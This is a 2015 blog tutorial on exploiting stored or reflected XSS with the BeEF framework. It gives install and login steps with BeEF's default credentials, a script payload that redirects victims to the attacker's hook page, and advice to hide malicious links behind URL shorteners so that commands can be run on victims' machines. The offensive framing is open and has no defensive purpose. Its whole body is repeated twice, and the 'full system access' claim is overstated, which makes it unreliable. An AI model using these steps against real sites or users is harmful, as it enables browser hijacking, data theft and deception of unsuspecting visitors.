Exploiting XSS for Full System Access: Beef Exploitation Framework
Tuesday, November 10, 2015
By
Jitendra
Hi,
Today we will discuss that how we can exploit XSS for full system access or for running command on a victim computer.
Their are two main types of XSS reflected and stored.
Stored XSS means where we can store XSS vector permanently on server such as in database or message forums. Then the malicious script is executed when user tries to retrieve the information.
Reflected XSS are those where the injected script is reflected off the web server, such as in an error message, search result. Reflected attacks are delivered to victims via some other methods, such as in an e-mail message, or on some other web site. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user’s browser. The browser then executes the code because it came from a "trusted" server.
Lets start exploiting it.
In the exploitation we will use the a tools which comes is Major linux distribution know as BEEF exploitation framework.
If this tools is not currently installed on your system give this command in terminal to install it
>>>sudo apt-get install beef
It will install it in seconds and then you are ready to exploiting the XSS.
Now start beef exploitation framework UI in your browser. You can easily type beef in your terminal to know where the UI is situated but if you can do this you have and alternate option beef framework always works on port no 3000 so just check your ip address with command
>>> ifconfig
copy the ip address and visit this link
Your_Ip_address:3000/ui/panel
Now it will take you to the login panel of beef framework it will look like this
Default Username:Password is beef:beef
Now login to this and it will take to to this page
here click where i located with small arrow mark
it will take to the url like this
Your_ip_add:3000/demos/butcher/index.html
copy this and create a XSS vector like this
<script>window.location="YoUr_url"</script>
Now Store this XSS vector or if you are exploiting the reflected XSS then short the whole url using any url shorten service like bit.ly
After storing the XSS or in reflected when user click the XSS vector link
It will show you his ip address the many information about his browser and pc
like this
Now click on the command portion and you can run command on victim computer
Hope You enjoyed this post this post if you have any suggestion please let me know
fell free to comment
Thanks
Jitendra K Singh and Sooraj Shekhar
Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!
Today we will discuss that how we can exploit XSS for full system access or for running command on a victim computer.
Their are two main types of XSS reflected and stored.
Stored XSS means where we can store XSS vector permanently on server such as in database or message forums. Then the malicious script is executed when user tries to retrieve the information.
Reflected XSS are those where the injected script is reflected off the web server, such as in an error message, search result. Reflected attacks are delivered to victims via some other methods, such as in an e-mail message, or on some other web site. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user’s browser. The browser then executes the code because it came from a "trusted" server.
Lets start exploiting it.
In the exploitation we will use the a tools which comes is Major linux distribution know as BEEF exploitation framework.
If this tools is not currently installed on your system give this command in terminal to install it
>>>sudo apt-get install beef
It will install it in seconds and then you are ready to exploiting the XSS.
Now start beef exploitation framework UI in your browser. You can easily type beef in your terminal to know where the UI is situated but if you can do this you have and alternate option beef framework always works on port no 3000 so just check your ip address with command
>>> ifconfig
copy the ip address and visit this link
Your_Ip_address:3000/ui/panel
Now it will take you to the login panel of beef framework it will look like this
Default Username:Password is beef:beef
Now login to this and it will take to to this page
here click where i located with small arrow mark
it will take to the url like this
Your_ip_add:3000/demos/butcher/index.html
copy this and create a XSS vector like this
<script>window.location="YoUr_url"</script>
Now Store this XSS vector or if you are exploiting the reflected XSS then short the whole url using any url shorten service like bit.ly
After storing the XSS or in reflected when user click the XSS vector link
It will show you his ip address the many information about his browser and pc
like this
Now click on the command portion and you can run command on victim computer
Now you can do what you want
Hope You enjoyed this post this post if you have any suggestion please let me know
fell free to comment
Thanks
Jitendra K Singh and Sooraj Shekhar
Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!
Written by CK Admins
Computer Korner is an open knowledge sharing site, where the we try to share our experience with IT, Security, Networking, System Administration tasks faced in day to day life. Articles from visitors are highly appreciated. Contact Us at : Click Here
![Admin Login Page Finder [FIND HIM]](http://3.bp.blogspot.com/-GhtWWRl4-xU/UB0hynJzAQI/AAAAAAAAAlA/7awzEtAFL0w/s72-c/mysqladded.PNG){kind=small}
0 comments: